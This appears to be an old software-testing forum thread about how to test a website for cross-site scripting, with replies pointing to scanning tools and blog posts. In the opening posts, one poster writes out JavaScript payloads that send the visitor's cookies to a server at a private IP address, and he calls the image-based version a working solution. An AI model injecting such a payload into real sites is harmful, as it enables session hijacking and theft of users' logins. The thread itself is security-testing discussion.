The online community for software testing & quality assurance professionals
 
 
Calendar   Today's Topics
Sponsors:




Lost Password?

Home
BetaSoft
Blogs
Jobs
Training
News
Links
Downloads



Software Testing >> Security Testing

Pages: 1
Gaurang_Shah
Advanced Member


Reged: 02/11/08
Posts: 558
Loc: Ahmedabad, India
How to test XSS Vulnerability
      #573637 - 06/09/09 04:09 AM

Hi guys,
I know might be just after reading the heading of post most of the people will suggest me the threads already in this forum. But Gyus I have read that all. And other much stuff from the net. So by now I know all about XSS.
But the question is how to test that (my) site is vulnerable to this ??? And this don't mean by any standard tool

My site provides the user to post the data and they can also embed the javascript too . So to test the XSS Vulnerability I write down the following code. Which will logged the session of the user in the my servers log.
Code:

<script>
var adr = 'http://10.101.1.207/'+escape(document.cookie);
xmlhttp=new new XMLHttpRequest();
xmlhttp.open("GET",adr,true);
xmlhttp.send(adr);
</script>


ya ya ya,, I know this won't work as all the browser has same origin policy.

Then what the hell is this XSS ??? On all the sites and forum I read they have told that through this you can easily hijack the session. But I don't think this is that much easy. Or is this ??? I mean how can i test that.. ???

--------------------
GauranG Shah
I don't make the software, Rather I make it better.
My Blogs:
All About Automation
Spell Checker


Post Extras: Print Post   Remind Me!   Notify Moderator  
Gaurang_Shah
Advanced Member


Reged: 02/11/08
Posts: 558
Loc: Ahmedabad, India
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #573646 - 06/09/09 05:17 AM

Finally i find out the solution. I just replace the code with following
Code:

<script>
var req_img = new Image();
req_img.src="http://10.101.1.207/"+document.cookie;
</script>



--------------------
GauranG Shah
I don't make the software, Rather I make it better.
My Blogs:
All About Automation
Spell Checker


Post Extras: Print Post   Remind Me!   Notify Moderator  
gsp28
Newbie


Reged: 07/06/09
Posts: 4
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #578270 - 07/06/09 04:10 AM

I want to check/test a website developed by our developers in PHP technology in our local host environment for which i need specific feedbacks and of course the work flow for testing the intended website for XSS, SQL injection, Malicious file execution etc properties which come specifically under the Vulnerability testing.

It would be a real great help(guidelines/procedures to "How to test a website in PHP for XSS threats") if anyone can apply a little concern in making my aforesaid activity a success.

Expecting a speed reply from your side.

Have a Great Day Ahead.

Thanks and regards;
Girija S Parhi.

SQA Tester


Post Extras: Print Post   Remind Me!   Notify Moderator  
tmarshallva
Member


Reged: 02/15/07
Posts: 223
Loc: Virginia, USA
Re: How to test XSS Vulnerability [Re: gsp28]
      #578330 - 07/06/09 07:03 AM

Girija, this should probably have its own topic instead of hijacking this thread.

EDIT- Moved reply to new topic.


--------------------
-Troy
Do or do not... there is no try. -Yoda

Edited by tmarshallva (07/06/09 07:04 AM)


Post Extras: Print Post   Remind Me!   Notify Moderator  
saxenavivek
Newbie


Reged: 09/10/09
Posts: 1
Loc: Bangalore
Re: How to test XSS Vulnerability [Re: tmarshallva]
      #590237 - 09/10/09 06:51 AM

do we have some iframe related injection or other injection for the input field.

or if some body knows the scripting witch we are using for XSS
please let me know............

--------------------
-------------------------
Vivek
need to improve....


Post Extras: Print Post   Remind Me!   Notify Moderator  
nocountry4bug
Newbie


Reged: 02/26/08
Posts: 5
Re: How to test XSS Vulnerability [Re: saxenavivek]
      #614660 - 02/21/10 07:42 PM

You can use some tool such as Acunetix or a addin of Fireox XSS Me to test XSS.

Post Extras: Print Post   Remind Me!   Notify Moderator  
dbrain
Member


Reged: 03/13/03
Posts: 27
Loc: london
Re: How to test XSS Vulnerability [Re: nocountry4bug]
      #622443 - 04/15/10 06:14 AM

Quote:

You can use some tool such as Acunetix or a addin of Fireox XSS Me to test XSS.




I've found XSS Me to be somewhat useful as well


Post Extras: Print Post   Remind Me!   Notify Moderator  
sekharg4u
Newbie


Reged: 08/28/08
Posts: 22
Re: How to test XSS Vulnerability [Re: Gaurang_Shah]
      #633877 - 07/08/10 04:34 AM

For XSS vulnerability u need to check "The area of the application where the user input is shown back to the user"(all these areas are vulnerability to XSS..check source code or use proxy tools..)

Post Extras: Print Post   Remind Me!   Notify Moderator  
TJLEE
Member


Reged: 05/26/09
Posts: 96
Loc: Russia
Re: How to test XSS Vulnerability [Re: sekharg4u]
      #689347 - 10/21/11 06:24 AM

http://qaquestions.wordpress.com/2011/10/21/xss-pay-attention-to-input-validation/ here some intro

--------------------
Regards
Vasily
Blog: http://qaquestions.wordpress.com/

Twitter: http://twitter.com/pythonkaa


Post Extras: Print Post   Remind Me!   Notify Moderator  
tmpalaniselvam
Veteran


Reged: 09/18/01
Posts: 2511
Loc: Bangalore,India
Re: How to test XSS Vulnerability [Re: TJLEE]
      #694170 - 12/22/11 02:10 AM

Have a look at http://tips-testing.blogspot.com/2008/03/security-testing-css-or-xss.html

--------------------
Thanks & Regards,
Palani.
http://tips-testing.blogspot.com/index.html
Quote: Dont hesitate to initiate!


Post Extras: Print Post   Remind Me!   Notify Moderator  
Pages: 1



Extra information
0 registered and 1 anonymous users are browsing this forum.

Moderator:  icruiser, AJ, Walen 

Print Topic

Forum Permissions
      You cannot start new topics
      You cannot reply to topics
      HTML is disabled
      UBBCode is enabled

Rating:
Topic views: 10001

Rate this topic

Jump to

Contact Us | Privacy statement SQAForums

Powered by UBB.threads™ 6.5.5